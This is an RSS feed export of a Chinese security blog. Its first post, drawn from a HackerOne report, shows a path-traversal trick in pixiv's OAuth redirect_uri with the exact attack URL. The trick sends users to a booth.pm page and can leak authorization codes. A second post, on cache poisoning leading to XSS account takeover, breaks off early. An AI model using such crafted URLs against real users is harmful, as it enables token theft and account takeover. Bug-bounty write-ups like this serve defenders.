<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>迪哥讲事</title>
    <link>https://wechat2rss.xlab.app/feed/6fbc842cdb8fd52f341af76f6aaf6cba21a23f7c.xml</link>
    <description>作者主页: https://github.com/richard1230&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (迪哥讲事)</managingEditor>
    <pubDate>Mon, 18 May 2026 11:00:35 +0800</pubDate>
    <lastBuildDate>Mon, 18 May 2026 11:00:35 +0800</lastBuildDate>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM7epB5Xcptumia2NgfAWaU7AujngWVrSq8n67iczu6oF8xg/0</url>
      <title>迪哥讲事</title>
      <link>https://wechat2rss.xlab.app/feed/6fbc842cdb8fd52f341af76f6aaf6cba21a23f7c.xml</link>
    </image>
    <item>
      <title>通过redirect_uri来获取用户oauth令牌</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499451&amp;idx=1&amp;sn=e0ee806ec98616e0a9c270589d828a08</link>
      <description>通过redirect_uri来获取用户oauth令牌正文正常情况下与攻击情况下的请求对比：正常情况下的请求：h</description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-18 11:00</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=231f99af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F7xtecWUgCRzVBb0WUgMgXHjPWrCRH115DmmwY7UVN7X4VoZlt3ibXWWEj0sjGSoX8hnt34BXbN7hKXH9dAMicZPqV95snlWMwD5Iy8wx5yQx0%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">通过redirect_uri来获取用户oauth令牌</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=7564155b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRxlTQyf4jq8LORuQiaZdGIcuwBoMgPibglbhyxls8siay8ueAjvibgq8MVhD43iaicxwnu2zepgCDHTtMdAQXaZEJNIM0OjvMSdrOLibM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">正常情况下与攻击情况下的请求对比：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">正常情况下的请求：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf=""><a href="https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&amp;redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback&amp;response_type=code&amp;scope=" target="_blank">https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&amp;redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback&amp;response_type=code&amp;scope=</a></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-works+</span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-favorite-users+</span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-friends+</span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-profile+</span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-email+write-profile&amp;state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">redirect_uri: <a href="https://booth.pm/users/auth/pixiv/callback" target="_blank">https://booth.pm/users/auth/pixiv/callback</a> </span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该请求在 OAuth 认证流程完成后会将用户重定向到 booth.pm 的回调地址。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击情况下的请求：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf=""><a href="https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&amp;redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/4503924&amp;response_type=code&amp;scope=" target="_blank">https://oauth.secure.pixiv.net/v2/auth/authorize?client_id=a1Z7w6JssUQkw5Hid0uIDeuesue9&amp;redirect_uri=https%3A%2F%2Fbooth.pm%2Fusers%2Fauth%2Fpixiv%2Fcallback/../../../../ja/items/4503924&amp;response_type=code&amp;scope=</a></span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-works+</span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-favorite-users+</span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-friends+</span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-profile+</span><span style="box-sizing: border-box;color: rgb(230, 192, 123);cursor: pointer;line-height: 26px;"><span leaf="">read</span></span><span leaf="">-email+write-profile&amp;state=%3A1a38b53563599621ce25094661b1c4458ddb52d79d771149</span><br style="box-sizing: border-box;cursor: pointer;"/><span leaf="">redirect_uri: <a href="https://booth.pm/users/auth/pixiv/callback/../../../../ja/items/4503924" target="_blank">https://booth.pm/users/auth/pixiv/callback/../../../../ja/items/4503924</a> </span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">通过路径遍历漏洞，攻击者将用户重定向到自己的商品页面 </span><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 4px;border-style: none;border-width: 3px;border-color: rgb(0, 0, 0) rgba(0, 0, 0, 0.4) rgba(0, 0, 0, 0.4);border-radius: 4px;overflow-wrap: break-word;word-break: break-all;"><span leaf=""><a href="https://booth.pm/ja/items/4503924" target="_blank">https://booth.pm/ja/items/4503924</a></span></code><span leaf="">，并可能通过 Google Analytics 等工具暴露用户的授权码。</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset; text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=3801a2d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRwS3MAEQ4kud0PpeibcrDWvqDkgc6iajcFtNR5pBUU9vFpdjAns9ZIJLB0quVglib17oehTYZUEWXcJibPR5HuBQ5Fhf0SClR0vciaM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style=" box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px; text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset; "><span leaf="">参考</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><a href="https://hackerone.com/reports/1861974" target="_blank">https://hackerone.com/reports/1861974</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=0b98ba28&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499451%26idx%3D1%26sn%3De0ee806ec98616e0a9c270589d828a08">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 18 May 2026 11:00:00 +0800</pubDate>
    </item>
    <item>
      <title>缓存投毒导致的 XSS 接管账号</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499445&amp;idx=1&amp;sn=ab3e978cb7b499afac2b1c57e87b2c9f</link>
      <description>缓存投毒导致的 XSS 接管账号正文通过缓存投毒导致的 XSS 接管账号。</description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-15 11:00</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=dceab448&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F7xtecWUgCRwGKs1STvy5KpYsmJxz1AJnu1UYXR9pj4cX2eyr2vic70CAdyTI5kZeGTXYtibxmL6bUdp1mp9Ve4LoxyOjJhnViaaia3qM5WOndK0%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">缓存投毒导致的 XSS 接管账号</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=58e9b0ad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F7xtecWUgCRyE8ryAzs0iasLMZfWsjVnnHUPZ8nsJKmwTuicsDsduOy9O7Gc91ULWu7LTvkcICQWibcnJawsjnQcuTxUEoTQzFoHM8VjEjwhVj4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">通过缓存投毒导致的 XSS 接管账号。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">原因是：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">hav Cookie 会被反射到这个响应里：</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 14px;cursor: pointer;color: rgb(40, 202, 113);line-height: 1.8em;letter-spacing: 0em;background: none left top / auto no-repeat scroll padding-box border-box rgba(27, 31, 35, 0.05);width: auto;height: auto;margin: 0px 2px;padding: 2px 